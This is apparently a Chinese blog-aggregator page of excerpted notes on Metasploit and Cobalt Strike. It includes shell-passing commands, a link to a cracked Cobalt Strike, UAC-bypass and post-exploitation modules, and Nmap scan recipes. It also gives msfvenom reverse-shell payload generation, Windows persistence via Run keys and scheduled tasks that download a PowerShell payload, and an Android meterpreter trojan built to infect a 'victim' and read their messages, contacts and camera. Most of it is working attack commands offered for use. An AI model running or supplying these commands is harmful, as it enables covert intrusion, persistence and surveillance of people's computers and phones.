meterpreter

metasploit与Cobaltstrike互相派生shell

会有一股神秘感。 提交于 2019-12-20 17:44:57
msf 派生 shell 给 Cobalt strike(前提有一个meterpreter) msf exploit(handler) > use exploit/windows/local/payload_inject   msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http   msf exploit(payload_inject) > set DisablePayloadHandler true   msf exploit(payload_inject) > set LHOST 192.168.229.143   msf exploit(payload_inject) > set LPORT 1212   msf exploit(payload_inject) > set SESSION 1   msf exploit(payload_inject) > exploit Cobalt strike 派生 shell 给 MSF(前提有个beaconshell) msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload =>

Cobalt Strike学习笔记

生来就可爱ヽ(ⅴ<●) 提交于 2019-12-16 10:50:16
  Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。Cobalt Strike主要用于团队作战,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。    Cobalt Strike ,据说现在最新版为3.9,主要分为试用版和付费版,试用版为21天,付费版3500美元,据说网上也有一些 破解教程 , cobaltstrik3.6破解版下载 密码: 51tg。因为Cobalt Strike是美国对外限制型出口软件,只在美国和加拿大允许发售,所以我们需要google搜索下usa的个人代理来绕开限制。 0x01 安装与运行   Cobalt Strike需要JAVA环境,需要注意的是JAVA环境不要安装最新版,否则会出一些问题,Cobalt Strike分为客户端和服务端可分布式操作可以协同作战。但一定要架设在外网上,或者自己想要搭建的环境中,服务器端只能运行在Linux系统上。其中关键的文件是teamserver以及cobaltstrike.jar,将这两个文件放到服务器上同一个目录,然后运行:

后渗透流程

假如想象 提交于 2019-12-10 07:33:57
后渗透流程 权限提升 绕过UAC msf模块 Exploit/windows/local/bypassuac Exploit/windows/local/bypassuac_injection Exploit/windows/local/bypassuac_vbs 系统提权 提高程序运行级别 msf模块(Exploit/windows/local/ask) 缺点:需要uac交互 后渗透信息收集 msf模块(post) 获取目标主机的分区情况: post/windows/gather/forensics/enum_drives 判断是否为虚拟机: post/windows/gather/checkvm 开启了哪些服务: post/windows/gather/enum_applications 查看共享: post/windows/gather/enum_shares 获取主机最近的系统操作: post/windows/gather/dumplinks 查看补丁: post/windows/gather/enum_applications enum_patches scraper 脚本 路径:/usr/share/metasploit-framework/scripts/meterpreter ( meterpreter下run scraper ) 保存信息的目录:/root/

Metasploit笔记

徘徊边缘 提交于 2019-12-10 00:17:09
  Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。 0x01 基本操作 1、运行   Shell中直接输入msfconsole 2、建立搜索缓存(数据库) 启动PostgreSQL数据库服务 :service postgresql start 监听5432端口 初始化Metasploit数据库 :msfdb init 查看数据库联接情况 :msfconsole db_status 建立数据库缓存 :msfconsole db_rebuild_cache 3、专业术语 12345 – Exploit,攻击工具/代码 – Payload,攻击载荷 – Shellcode – Module,模块 – Listener,监听器 4、Metasploit主目录 Kali Linux /usr/share/metasploit-framework 5、常用命令 123456789101112 show exploits – 查看所有可用的渗透攻击进程代码 show auxiliary – 查看所有可用的辅助攻击工具 show options – 查看该模块所有可用选项 show

渗透测试工具实战技巧合集

自作多情 提交于 2019-12-09 10:18:22
最好的 NMAP 扫描策略 # 适用所有大小网络最好的 nmap 扫描策略 # 主机发现,生成存活主机列表 $ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24 $ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt # 端口发现,发现大部分常用端口 # http://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf $ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt # 端口发现,发现全部端口,但 UDP 端口的扫描会非常慢 $ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt # 显示 TCP\UDP 端口 $ grep "open"

MSF小记

青春壹個敷衍的年華 提交于 2019-12-04 15:23:10
0x00 Windows,Linux反弹shell生成 Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径 Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径 0x01 msfvenom命令参数: 1 Options: 2 -p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定 3 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all 4 -n, --nopsled <length> 为payload预先指定一个NOP滑动长度 5 -f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表) 6 -e, --encoder [encoder] 指定需要使用的encoder(编码器) 7 -a, --arch <architecture>

metasploit安卓木马

只愿长相守 提交于 2019-12-03 23:12:26
metasploit---安卓木马入侵 (仅供学习使用,禁止非法使用) 1.生成木马程序 msfvenom -p android/meterpreter/reverse_tcp LHOST=本机ip LPORT=本机端口 R > 保存路径/文件名.apk 这里我们使用了反射型tcp,让目标主机连接我们,有时攻击服务器时这种方法可以很好的绕过防火墙。 2.想方设法欺骗对方安装木马app 3.打开msfconsole开始攻击 //选择模块 use exploit/multi/handler //显示攻击载荷 show payloads //设置攻击载荷 set payload android/meterpreter/reverse_tcp //显示需要配置的选项 show options //设置本机ip set lhost 本机ip //设置本机监听端口 set lport 本机端口 4.攻击成功,则会得到一个meterpreter会话 输入help查看帮助。 Then you can do what you want to do. Fun! 来源: https://www.cnblogs.com/WTa0/p/11810885.html

Window权限维持(一):注册表运行键

随声附和 提交于 2019-12-03 13:59:11
在红队行动中在网络中获得最初的立足点是一项耗时的任务。因此,持久性是红队成功运作的关键,这将使团队能够专注于目标,而不会失去与指挥和控制服务器的通信。 在Windows登录期间创建将执行任意负载的注册表项是红队游戏手册中最古老的技巧之一。这种持久性技术需要创建注册表运行键各种威胁因素和已知工具,如Metasploit、Empire和SharPersist,都提供了这种能力,因此,成熟的SOC团队将能够检测到这种恶意活动。 命令行 注册表项可以从终端添加到运行键以实现持久性。这些键将包含对用户登录时将执行的实际负载的引用,已知使用此持久性方法的威胁因素和红队使用以下注册表位置。 reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe" reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe" reg add "HKEY_CURRENT_USER

Window权限维持--计划任务

喜你入骨 提交于 2019-12-03 13:29:45
Windows操作系统提供了一个实用程序(schtasks.exe),使系统管理员能够在特定的日期和时间执行程序或脚本。这种行为作为一种持久性机制被red teams利用。通过计划任务执行持久性不需要管理员权限,但如果已获得提升的权限,则允许进一步操作,例如在用户登录期间或在空闲状态期间执行任务。 计划任务的持久化技术可以手动实现,也可以自动实现。有效负载可以从磁盘或远程位置执行,它们可以是可执行文件、powershell脚本或scriptlet的形式。 这被认为是一种旧的持久性技术,但是它仍然可以在red team场景中使用,并且由各种开源工具支持 。Metasploit 的web_delivery模块可用于托管和生成各种格式的有效载荷。 use exploit/multi/script/web_delivery set payload windows/x64/meterpreter/reverse_tcp set LHOST 10.0.2.21 set target 5 exploit 在命令提示符下,“ schtasks ”可执行文件可用于创建计划任务,该任务将在每个Windows登录中以SYSTEM的形式下载并执行基于PowerShell的有效负载。 schtasks /create /tn PentestLab /tr "c:\windows\syswow64

利用meterpreter生成一个简单的android木马

匿名 (未验证) 提交于 2019-12-03 00:42:01
这个学习过程我是在kali linux下进行的,成功的感染了自己的手机,当然了apk包没改签名也没有加小图标,所以只能当是一个实验吧。 首先使用这个命令: 使用这个命令,可以生成一个apk包,但是我在这里标明一下,LHOST的IP写自己网络的IP,LPORT写一个没有被使用的端口,apk包名自己可以随意取。 接下来打开meterpreter软件: 加载模块: 之后设置宿主机的IP和监听端口: 再然后把apk压缩成zip包,发送到受害者手机上。之后回到kali,在meterpreter软件 下,输入exploit等受害者安装木马并执行木马,之后就可以进行一系列操作,比如获取受害者手机短信信息,摄像头,或者是聊天记录,联系人电话等。 原文:https://www.cnblogs.com/fzca951/p/9346453.html